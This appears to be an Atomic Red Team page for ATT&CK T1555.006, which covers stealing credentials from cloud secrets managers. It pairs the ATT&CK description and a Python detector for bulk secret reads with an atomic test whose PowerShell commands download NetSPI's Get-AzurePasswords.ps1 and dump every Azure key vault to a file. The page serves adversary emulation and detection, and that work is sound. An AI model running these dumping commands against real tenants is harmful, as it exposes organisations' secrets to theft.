
T1555.006

Credentials from Password Stores: Cloud Secrets Management Stores

Description from ATT&CK

Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.

Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.

If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged Cloud Accounts or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as get-secret-value in AWS, gcloud secrets describe in GCP, and az key vault secret show in Azure.(Citation: Permiso Scattered Spider 2023)(Citation: Sysdig ScarletEel 2.0 2023)(Citation: AWS Secrets Manager)(Citation: Google Cloud Secrets)(Citation: Microsoft Azure Key Vault)

Note: this technique is distinct from Cloud Instance Metadata API in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.
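The description above names the API calls that return secret material (get-secret-value, secret show, and the like); the Microburst test further down produces a burst of those calls against every vault in a subscription. The following Python is an added example, not part of the ATT&CK description or the Atomic Red Team test: it normalises AWS CloudTrail records for secretsmanager GetSecretValue and Azure Key Vault AuditEvent diagnostic records for SecretGet into one shape, then flags any principal that reads an unusually large number of distinct secrets inside a short window, which is what a "dump every vault" run looks like in the logs. Field names follow the public CloudTrail and Key Vault diagnostic log schemas; the sample records, account identifiers, user names, threshold and window are constructed assumptions for the demo.

```python
"""Bulk secret-read detector for cloud secrets managers (added example).

Illustrative code, not part of ATT&CK or Atomic Red Team. Sample records,
identifiers, threshold and window below are constructed assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# API operations that return secret material rather than only metadata.
AWS_SECRET_READS = {"GetSecretValue", "BatchGetSecretValue"}
AZURE_SECRET_READS = {"SecretGet"}


def parse_cloudtrail(record):
    """Normalise one CloudTrail record; return None unless it is a secret read."""
    if record.get("eventSource") != "secretsmanager.amazonaws.com":
        return None
    if record.get("eventName") not in AWS_SECRET_READS:
        return None
    ts = datetime.strptime(record["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
    return {
        "ts": ts.replace(tzinfo=timezone.utc),
        "principal": record["userIdentity"]["arn"],
        "secret": record["requestParameters"]["secretId"],
        "cloud": "aws",
    }


def parse_keyvault_audit(record):
    """Normalise one Key Vault AuditEvent record; None unless it is a successful SecretGet."""
    if record.get("category") != "AuditEvent":
        return None
    if record.get("operationName") not in AZURE_SECRET_READS or record.get("resultType") != "Success":
        return None
    claims = record["identity"]["claim"]
    return {
        "ts": datetime.fromisoformat(record["time"].replace("Z", "+00:00")),
        "principal": claims.get("upn") or claims.get("appid"),  # user or service principal
        "secret": record["properties"]["id"],  # full secret identifier URL
        "cloud": "azure",
    }


def normalise(records):
    """Route each raw record to the right parser; drop everything that is not a secret read."""
    events = []
    for rec in records:
        ev = parse_cloudtrail(rec) if "eventSource" in rec else parse_keyvault_audit(rec)
        if ev is not None:
            events.append(ev)
    return events


def detect_bulk_reads(events, threshold=5, window=timedelta(seconds=60)):
    """Alert once per principal that reads >= threshold distinct secrets within the sliding window."""
    recent = defaultdict(deque)  # principal -> deque of (timestamp, secret) inside the window
    alerted = set()
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        q = recent[ev["principal"]]
        q.append((ev["ts"], ev["secret"]))
        while q and ev["ts"] - q[0][0] > window:
            q.popleft()  # expire reads older than the window
        distinct = {secret for _, secret in q}
        if len(distinct) >= threshold and ev["principal"] not in alerted:
            alerted.add(ev["principal"])
            alerts.append({
                "cloud": ev["cloud"],
                "principal": ev["principal"],
                "distinct_secrets": len(distinct),
                "window_end": ev["ts"],
            })
    return alerts


# --- constructed sample records (not real logs) ------------------------------
def _ct(time, arn, secret_id):
    return {"eventTime": time, "eventSource": "secretsmanager.amazonaws.com",
            "eventName": "GetSecretValue", "userIdentity": {"arn": arn},
            "requestParameters": {"secretId": secret_id}}


def _kv(time, upn, secret_name):
    return {"time": time, "category": "AuditEvent", "operationName": "SecretGet",
            "resultType": "Success", "identity": {"claim": {"upn": upn}},
            "properties": {"id": f"https://corp-kv.vault.azure.net/secrets/{secret_name}"}}


APP_ROLE = "arn:aws:sts::123456789012:assumed-role/app-role/i-0abc"
CONTRACTOR = "arn:aws:iam::123456789012:user/contractor"

SAMPLE_LOGS = [
    # Benign: a workload re-reading its own database credential minutes apart.
    _ct("2024-03-01T10:00:00Z", APP_ROLE, "prod/db/password"),
    _ct("2024-03-01T10:07:00Z", APP_ROLE, "prod/db/password"),
    # Suspicious: one IAM user walking six different secrets in 25 seconds.
    *[_ct(f"2024-03-01T11:00:{i * 5:02d}Z", CONTRACTOR, f"prod/svc{i}/token") for i in range(6)],
    # Suspicious: the same enumeration pattern against a Key Vault.
    *[_kv(f"2024-03-01T12:00:{i * 4:02d}Z", "jdoe@example.com", f"secret-{i}") for i in range(5)],
    # Benign: a single read by a backup job.
    _kv("2024-03-01T12:30:00Z", "svc-backup@example.com", "backup-key"),
]


def run(records=SAMPLE_LOGS, threshold=5, window_seconds=60):
    return detect_bulk_reads(normalise(records), threshold, timedelta(seconds=window_seconds))


if __name__ == "__main__":
    for a in run():
        print(f"[ALERT] {a['cloud']}: {a['principal']} read {a['distinct_secrets']} "
              f"distinct secrets by {a['window_end'].isoformat()}")
```

Running the block as-is raises two alerts, one for the AWS user and one for the Azure UPN, and none for the two benign readers. The threshold and window are the tuning knobs: a legitimate deployment job may read many secrets at once, so in practice the baseline should come from each principal's normal read set, and Key Vault logging only exists if a diagnostic setting forwards AuditEvent to a workspace, just as CloudTrail must have management events enabled for the account. GCP Secret Manager's AccessSecretVersion calls appear only in Data Access audit logs, which are off by default, so the same detector needs those enabled before a third parser is worth adding.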

Atomic Tests

Atomic Test #1 - Azure - Dump All Azure Key Vaults with Microburst

Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file. See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/

Supported Platforms: Iaas:azure

auto_generated_guid: 1b83cddb-eaa7-45aa-98a5-85fb0a8807ea

Inputs:

Name | Description | Type | Default Value
username | Azure AD username | string |
password | Azure AD password | string | T1082Az
output_file | File to dump results to | string | $env:temp\T1528Test1.txt
subscription_id | Azure subscription id to search | string |

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

import-module "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
Connect-AzureRmAccount -Credential $Credential
Get-AzurePasswords -subscription '#{subscription_id}' > #{output_file}
cat #{output_file}

Cleanup Commands:

remove-item #{output_file} -force -erroraction silentlycontinue

Dependencies: Run with powershell!

Description: The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
Check Prereq Commands:
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"){exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\Get-AzurePasswords.ps1"
Description: The Azure RM module must be installed.
Check Prereq Commands:
try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
Get Prereq Commands:
Install-Module -Name AzureRM -Force -allowclobber
Description: The Azure module must be installed.
Check Prereq Commands:
try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
Get Prereq Commands:
Install-Module -Name Azure -Force -allowclobber